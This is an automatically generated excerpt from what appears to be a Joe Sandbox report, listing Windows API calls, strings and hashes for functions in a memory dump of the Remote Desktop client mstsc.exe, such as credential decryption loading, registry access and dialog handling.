                                                                                                              • Opcode Fuzzy Hash: 532b38b7caf88e4602cbef5fbfe46b97a079f0ac65e41af9f4a7868f7f101438
                                                                                                              • Instruction Fuzzy Hash: C941B432644305ABDF29FFA8AC8DF563BA6FB08314F241499F500DB1E2C779C8848B91
                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32(crypt32.dll,00000000,?,00000200,?,?,007BB96D), ref: 0080816C
                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00808182
                                                                                                              • GetLastError.KERNEL32(?,007BB96D), ref: 008081AE
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00796842: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000B,0079A670,00000004,007D42C5,00000004,00000000,?,007D42C5,0079A670,00000000,00000000,00000000), ref: 0079685F
                                                                                                              • GetLastError.KERNEL32(?,007BB96D), ref: 00808209
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,007BB96D), ref: 00808233
                                                                                                              • GetLastError.KERNEL32(?,007BB96D), ref: 00808255
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastLibrary$AddressFreeProc$HandleLoadMessageModuleTrace
                                                                                                              • String ID: CryptUnprotectData$crypt32.dll
                                                                                                              • API String ID: 2420746477-1827663648
                                                                                                              • Opcode ID: c91ee2deab15bca28b18f2a5c81f545d8d5a5aebab90548132801eff67e20f6e
                                                                                                              • Instruction ID: f10bde26a831516d6c03ee311ed62f6049f067070f8d47a2e2ab7b9b84c8d427
                                                                                                              • Opcode Fuzzy Hash: c91ee2deab15bca28b18f2a5c81f545d8d5a5aebab90548132801eff67e20f6e
                                                                                                              • Instruction Fuzzy Hash: 4E418071240A00EFEBADAB689C4EF263A9AFB45314F250459F581C71E2DE79CC80C722
                                                                                                              APIs
                                                                                                              • EventActivityIdControl.ADVAPI32(00000004,?), ref: 007EB183
                                                                                                              • SetEvent.KERNEL32(?), ref: 007EB20C
                                                                                                              • EventActivityIdControl.ADVAPI32(00000002,?,?), ref: 007EB6B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Event$ActivityControl
                                                                                                              • String ID:
                                                                                                              • API String ID: 3661690246-0
                                                                                                              • Opcode ID: fb033d4a63523055d4658149df4171a42f0acfed40595ba89691f8dbc88a22c8
                                                                                                              • Instruction ID: 182ddd32328e943c17bd0aeec1d209eec06b31ff85a9e4a92e21de8742373a03
                                                                                                              • Opcode Fuzzy Hash: fb033d4a63523055d4658149df4171a42f0acfed40595ba89691f8dbc88a22c8
                                                                                                              • Instruction Fuzzy Hash: C6123671201340DFDB18EF19DC88A6ABBA5FF88320F15455AF9459B2A2CB79EC41CF91
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020019,?,?,00000000,00000000,00000000), ref: 008870E1
                                                                                                              • wcsncpy_s.MSVCRT ref: 008871D4
                                                                                                              • wcsncat_s.MSVCRT ref: 008871EB
                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00000000,00000000), ref: 00887216
                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000), ref: 008872BB
                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000), ref: 008872D0
                                                                                                                • Part of subcall function 00887413: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,80004001,00000000,00000000), ref: 0088743D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpen$QueryValuewcsncat_swcsncpy_s
                                                                                                              • String ID: Domain
                                                                                                              • API String ID: 1312607024-2684689213
                                                                                                              • Opcode ID: 4d18942f8e54387f29e2a12d4ed9decdd9ec9a6c7d86416b82f297a8b1dde41e
                                                                                                              • Instruction ID: b29e306ab121813a6d90a730c4fa318c2031375d77c26c3422939db1013ff571
                                                                                                              • Opcode Fuzzy Hash: 4d18942f8e54387f29e2a12d4ed9decdd9ec9a6c7d86416b82f297a8b1dde41e
                                                                                                              • Instruction Fuzzy Hash: 7B8162759042299FDB25AF68DD88B9AB7B5FF88310F2041A9E81AD7350DB30DE81CF50
                                                                                                              APIs
                                                                                                                • Part of subcall function 0079B721: _vsnwprintf.MSVCRT ref: 0079B753
                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00020006,00000000,?,?,?,?,00000000), ref: 0080B23B
                                                                                                              • RegSetValueExW.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000), ref: 0080B334
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0080B3B2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateValue_vsnwprintf
                                                                                                              • String ID: Created$Opened$SOFTWARE\Microsoft\Terminal Server Client\%s$\
                                                                                                              • API String ID: 4039617372-1640073806
                                                                                                              • Opcode ID: 9edc1125a0c33751d89e6614de2ce07e08053f220368a634adadc6b3b902e8bf
                                                                                                              • Instruction ID: ae8cd99bbfb6c9b26e53c48f614d501cb100f9f706e15f4b19a9aef6bea97002
                                                                                                              • Opcode Fuzzy Hash: 9edc1125a0c33751d89e6614de2ce07e08053f220368a634adadc6b3b902e8bf
                                                                                                              • Instruction Fuzzy Hash: E561BF32204340AFEBA9DF58DC89E6A3BE6FB88304F25045EF551CB2E2D775C9149B52
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • QI for IMsRdpClientNonScriptable3 failed!, xrefs: 007BF1A1
                                                                                                              • IMsRdpDevice::get_DeviceInstanceId failed, xrefs: 007BF489
                                                                                                              • IMsRdpDeviceCollection::get_DeviceByIndex failed!, xrefs: 007BF4D4
                                                                                                              • DynamicDevices, xrefs: 007BF400
                                                                                                              • IMsRdpDeviceCollection::DeviceCount failed!, xrefs: 007BF26C
                                                                                                              • IMsRdpClient5::get_DeviceCollection failed!, xrefs: 007BF213
                                                                                                              • StringCchCopy failed, xrefs: 007BF543, 007BF58D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset
                                                                                                              • String ID: DynamicDevices$IMsRdpClient5::get_DeviceCollection failed!$IMsRdpDevice::get_DeviceInstanceId failed$IMsRdpDeviceCollection::DeviceCount failed!$IMsRdpDeviceCollection::get_DeviceByIndex failed!$QI for IMsRdpClientNonScriptable3 failed!$StringCchCopy failed
                                                                                                              • API String ID: 2221118986-430872028
                                                                                                              • Opcode ID: 21fd685182bedb019eac2c841290cb9f6e3567a7f54890eae006a1e4635b1250
                                                                                                              • Instruction ID: 5b80bbfd32be3afb98e6497cea1173594b8dea13f4e98ee6a73ce903b3e140c0
                                                                                                              • Opcode Fuzzy Hash: 21fd685182bedb019eac2c841290cb9f6e3567a7f54890eae006a1e4635b1250
                                                                                                              • Instruction Fuzzy Hash: 92C1A170500204DBDF29DF18DC99BAA37A6BF80714F1480B9E449972A2DF3CDD96CB91
                                                                                                              APIs
                                                                                                              • GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                              • GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                              • String ID: #C}$Advapi32.dll$EventActivityIdControl$Microsoft.Windows.RemoteDesktop
                                                                                                              • API String ID: 4061214504-2156307834
                                                                                                              • Opcode ID: 8d2905e31b948ab15a4d1358f9118a01bfdb7c0adf621d8085484339bc78c10b
                                                                                                              • Instruction ID: 955ffb0191904b4092c731fc444faf61cbc620659c96fc7d431aaac02fb84e7b
                                                                                                              • Opcode Fuzzy Hash: 8d2905e31b948ab15a4d1358f9118a01bfdb7c0adf621d8085484339bc78c10b
                                                                                                              • Instruction Fuzzy Hash: 90014F35A01209AFDB10EBA9DD0AABFBBB5FB44751F400025E905F2290DA709D058BA2
                                                                                                              APIs
                                                                                                                • Part of subcall function 007A97C5: IsWindow.USER32(?), ref: 007A97ED
                                                                                                                • Part of subcall function 007A97C5: GetWindowLongW.USER32(?,000000F0), ref: 007A981A
                                                                                                                • Part of subcall function 007A97C5: GetWindowLongW.USER32(?,000000EC), ref: 007A982D
                                                                                                                • Part of subcall function 007A97C5: GetMenu.USER32(?), ref: 007A9850
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 007A9287
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 007A92B1
                                                                                                              • GetWindowRect.USER32(?,00000006), ref: 007A92BC
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 007A92E3
                                                                                                              • ShowWindow.USER32(?,00000009), ref: 007A9337
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000006,?,00000002), ref: 007A9349
                                                                                                              • SetFocus.USER32(00000000), ref: 007A937E
                                                                                                              • GetLastError.KERNEL32 ref: 007A9388
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Long$Text$ErrorFocusLastMenuRectShow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3461709743-0
                                                                                                              • Opcode ID: da0ac6f6d2f5edc43eeadc07c0815f2067e266564cd0004a2ab8f1036602843e
                                                                                                              • Instruction ID: f4542d1407c94c69aa3b0cf9ab9aa7a3c9cb210f8c9e7e67db1264c782f4a00a
                                                                                                              • Opcode Fuzzy Hash: da0ac6f6d2f5edc43eeadc07c0815f2067e266564cd0004a2ab8f1036602843e
                                                                                                              • Instruction Fuzzy Hash: 7B514C75A006059FEB18DF68C899BBFBBB5FF89300F10461DEA56D7291DB38A901CB50
                                                                                                              APIs
                                                                                                              • EventActivityIdControl.ADVAPI32(00000001,?), ref: 007DE0E1
                                                                                                              • SysAllocString.OLEAUT32(?), ref: 007DE0EC
                                                                                                              • EventActivityIdControl.ADVAPI32(00000002,?), ref: 007DE184
                                                                                                              • EventActivityIdControl.ADVAPI32(00000002,?), ref: 007DE21C
                                                                                                              • EventActivityIdControl.ADVAPI32(00000002,?), ref: 007DE3CB
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00796842: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000B,0079A670,00000004,007D42C5,00000004,00000000,?,007D42C5,0079A670,00000000,00000000,00000000), ref: 0079685F
                                                                                                              Strings
                                                                                                              • Failed to create the endpoint connection UUID, xrefs: 007DE1F6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ActivityControlEvent$AddressAllocFreeHandleLibraryMessageModuleProcStringTrace
                                                                                                              • String ID: Failed to create the endpoint connection UUID
                                                                                                              • API String ID: 2855200568-2965209518
                                                                                                              • Opcode ID: 3c3e1242dacfa30e4abbf411b89a7eb2d9b1064752c07048a6594a309b01780a
                                                                                                              • Instruction ID: fa005a1ec1ac6199ab11e2d5008badec22a47eab8d3a75e8a14dbbe42f3b878c
                                                                                                              • Opcode Fuzzy Hash: 3c3e1242dacfa30e4abbf411b89a7eb2d9b1064752c07048a6594a309b01780a
                                                                                                              • Instruction Fuzzy Hash: 64A16E712047009FDB2AEF58D889F2A7BBABF48310F15445AF945DB3A2D739E841CB51
                                                                                                              APIs
                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,00000000,00000000,?), ref: 008022D9
                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 008023C6
                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?), ref: 00802420
                                                                                                              • LocalFree.KERNEL32(00000000), ref: 008024E1
                                                                                                                • Part of subcall function 00883E7C: EventActivityIdControl.ADVAPI32(00000001,00000000,00000000,00000000,0088B068,?), ref: 00883E9E
                                                                                                                • Part of subcall function 007A718E: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000A,0079A670,00000004,007D428A,0000000A,00000000,00000000,00000000,00000000,0000000A,?,007D428A), ref: 007A71E2
                                                                                                              • LocalFree.KERNEL32(?), ref: 008024EF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Local$AllocFree$ActivityControlEventMessageTracememcpy
                                                                                                              • String ID: RecordToString failed$ppwszSettingsStore
                                                                                                              • API String ID: 3711784381-3595829931
                                                                                                              • Opcode ID: 077a424551abe23e6081679994e7b2b4cc62640166f1bd9defee646565ff1d70
                                                                                                              • Instruction ID: b99d998810c2ffa6da304f03d7195c1312708ba26e385cd0af2d253cbec9953e
                                                                                                              • Opcode Fuzzy Hash: 077a424551abe23e6081679994e7b2b4cc62640166f1bd9defee646565ff1d70
                                                                                                              • Instruction Fuzzy Hash: 55A19C712043419FD799DF58C888B2ABBE6FB88314F14455DF948DB2E2DBB8C884CB56
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00809150
                                                                                                              • memset.MSVCRT ref: 00809166
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 0079686C: TraceMessage.ADVAPI32(00000008,?,0000002B,00781B08,0000000B,0088B068,00000004,00000000,00000005,00000000,00000000,00000000,00000000,?,007DBBCC,0079A670), ref: 007968AC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                              • String ID: %d.%d.%d.%d$%s.%d$GetMSRDCWFileVersion Failed !$StringCchPrintf failed!$pszVersion
                                                                                                              • API String ID: 2883347319-641655834
                                                                                                              • Opcode ID: bd833530e171706849da87aef3e950c5a027ea803ae5b3a74ebb3d13d51ca30f
                                                                                                              • Instruction ID: adbf8ae76bb7949aa76ae670192945f8ce945dfe8cd581d16fe1454bc0fd58e3
                                                                                                              • Opcode Fuzzy Hash: bd833530e171706849da87aef3e950c5a027ea803ae5b3a74ebb3d13d51ca30f
                                                                                                              • Instruction Fuzzy Hash: D7412871640214BFEBA8EB58DC4AF6A37A9FB48710F140099F944DB2D3DA39CD548762
                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32(shell32.dll,?,?,00000000,?,?,?,?,?,?,?,?,?,007DAD2C,?,00000001), ref: 007D4206
                                                                                                              • GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID), ref: 007D421C
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,007DAD2C,?,00000001,?,00000000,00000000), ref: 007D42FE
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 007A718E: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000A,0079A670,00000004,007D428A,0000000A,00000000,00000000,00000000,00000000,0000000A,?,007D428A), ref: 007A71E2
                                                                                                              Strings
                                                                                                              • SetCurrentProcessExplicitAppUserModelID, xrefs: 007D4216
                                                                                                              • Microsoft.Windows.RemoteDesktop, xrefs: 007D41F2
                                                                                                              • shell32.dll, xrefs: 007D41FC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeProc$HandleLoadMessageModuleTrace
                                                                                                              • String ID: Microsoft.Windows.RemoteDesktop$SetCurrentProcessExplicitAppUserModelID$shell32.dll
                                                                                                              • API String ID: 2109255295-1123326357
                                                                                                              • Opcode ID: 07fd1df72e10dfa49003633a87ce85513f05171a25e754b3ccfd3a0a4d70dab8
                                                                                                              • Instruction ID: 221adbc06287a5a1bb8ab7945cd18956c55a547cf933154ebc59f095fd73e529
                                                                                                              • Opcode Fuzzy Hash: 07fd1df72e10dfa49003633a87ce85513f05171a25e754b3ccfd3a0a4d70dab8
                                                                                                              • Instruction Fuzzy Hash: 0E41C231200344EBEB29AF5DD88DF153BA6BB45318F64005BF5019B2E2CB7DE8859B42
                                                                                                              APIs
                                                                                                              • GetSystemMetrics.USER32(0000000C), ref: 007D00D1
                                                                                                              • GetSystemMetrics.USER32(0000000B), ref: 007D00EF
                                                                                                              • GetDlgItem.USER32(?,00003364), ref: 007D0104
                                                                                                              • EndDialog.USER32(?,00000065), ref: 007D0161
                                                                                                              • EndDialog.USER32(?,00000003), ref: 007D0181
                                                                                                              Strings
                                                                                                              • mshelp://windows/?id=7704b5cf-ddb8-4062-acb3-0da9b2b916d7, xrefs: 007D0192
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DialogMetricsSystem$Item
                                                                                                              • String ID: mshelp://windows/?id=7704b5cf-ddb8-4062-acb3-0da9b2b916d7
                                                                                                              • API String ID: 1735843999-504666242
                                                                                                              • Opcode ID: 51eee849e31e3db31ecd84a4dbbd25813c841c3249fab609e0543780869f0a71
                                                                                                              • Instruction ID: e337f7ceceea6d210183b619e7f481b8c7b68c925484bd37e43d862fa9a364ea
                                                                                                              • Opcode Fuzzy Hash: 51eee849e31e3db31ecd84a4dbbd25813c841c3249fab609e0543780869f0a71
                                                                                                              • Instruction Fuzzy Hash: 8341AF31240209FBDB159F68DC09FAE7B76FF48720F04421AFA099A6A0D776D921DBD1
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000032FF), ref: 007C9246
                                                                                                              • GetWindowRect.USER32(00000000,00000004), ref: 007C9260
                                                                                                              • CreateDialogIndirectParamW.USER32(00000110,00000000,?,0081B0B0,?), ref: 007C92A4
                                                                                                              • ShowWindow.USER32(00000000,00000004,?,?,00000004,?,?,?,?), ref: 007C92B3
                                                                                                              • GetDlgItem.USER32(?,00001394), ref: 007C92C1
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000003,?,?,00000004,?,?,?,?), ref: 007C92D6
                                                                                                              • ShowWindow.USER32(00000000,00000000,?,?,00000004,?,?,?,?), ref: 007C92EC
                                                                                                                • Part of subcall function 00888456: malloc.MSVCRT ref: 0088846E
                                                                                                                • Part of subcall function 0081AD5B: memset.MSVCRT ref: 0081AD92
                                                                                                                • Part of subcall function 0081AD5B: memset.MSVCRT ref: 0081ADBC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$ItemShowmemset$CreateDialogIndirectParamRectmalloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1274338977-0
                                                                                                              • Opcode ID: 93525c70a8f66bb430ea6e64e2def57645d9bdabfaf9e2f735ccafa08eac580d
                                                                                                              • Instruction ID: 6e01d33e508f26d3bf1882e43cf5f7b682156bbe20b601e50e98669cde936beb
                                                                                                              • Opcode Fuzzy Hash: 93525c70a8f66bb430ea6e64e2def57645d9bdabfaf9e2f735ccafa08eac580d
                                                                                                              • Instruction Fuzzy Hash: 86318031601204AFDF11AF69CD89EAB7B69FF45711F048079BE099E196DB749900CBA1
                                                                                                              APIs
                                                                                                              • SelectPalette.GDI32(?,?,00000000), ref: 007AA140
                                                                                                              • RealizePalette.GDI32(?), ref: 007AA149
                                                                                                              • SelectPalette.GDI32(?,00000000,00000001), ref: 007AA177
                                                                                                              • GetClientRect.USER32(?,?), ref: 007AA199
                                                                                                              • CreateSolidBrush.GDI32(00FFFFFF), ref: 007AA1A4
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 007AA1AC
                                                                                                              • PatBlt.GDI32(?,00000000,00000000,?,?,00F00021), ref: 007AA1C2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PaletteSelect$BrushClientCreateObjectRealizeRectSolid
                                                                                                              • String ID:
                                                                                                              • API String ID: 1484475077-0
                                                                                                              • Opcode ID: 169a8061ecc39b3fd7efaa4409b4dd868f5a56765eedb061b2fa1b820d69eb52
                                                                                                              • Instruction ID: d2687790ddbfbb04cc8b0d1b2e598c8a15f3e1571c825d2dad1012f9e00a021f
                                                                                                              • Opcode Fuzzy Hash: 169a8061ecc39b3fd7efaa4409b4dd868f5a56765eedb061b2fa1b820d69eb52
                                                                                                              • Instruction Fuzzy Hash: 32217C35601609BFDB159FA8DC89FAFB7B8FF49310F144529B606D2190CB78AD41CBA2
                                                                                                              APIs
                                                                                                              • IsDlgButtonChecked.USER32(?,00003328), ref: 007C513A
                                                                                                              • IsDlgButtonChecked.USER32(?,00003330), ref: 007C514D
                                                                                                              • IsDlgButtonChecked.USER32(?,0000332F), ref: 007C5165
                                                                                                              • IsDlgButtonChecked.USER32(?,00003329), ref: 007C517D
                                                                                                              • IsDlgButtonChecked.USER32(?,0000332A), ref: 007C5192
                                                                                                              • IsDlgButtonChecked.USER32(?,0000332B), ref: 007C51A7
                                                                                                              • IsDlgButtonChecked.USER32(?,0000332C), ref: 007C51BC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ButtonChecked
                                                                                                              • String ID:
                                                                                                              • API String ID: 1719414920-0
                                                                                                              • Opcode ID: e2d6726ab6230a9e6c2b1e32b8e2dd890c71c3def10049f7643c71a308de6b09
                                                                                                              • Instruction ID: 963740901077da1c396f11a701f1093631264599974c227383821803b6fc45fc
                                                                                                              • Opcode Fuzzy Hash: e2d6726ab6230a9e6c2b1e32b8e2dd890c71c3def10049f7643c71a308de6b09
                                                                                                              • Instruction Fuzzy Hash: 5821A171600759BBEB255F26BC0CF027F65FB14750F25812CF805D51E1EB6AE9918780
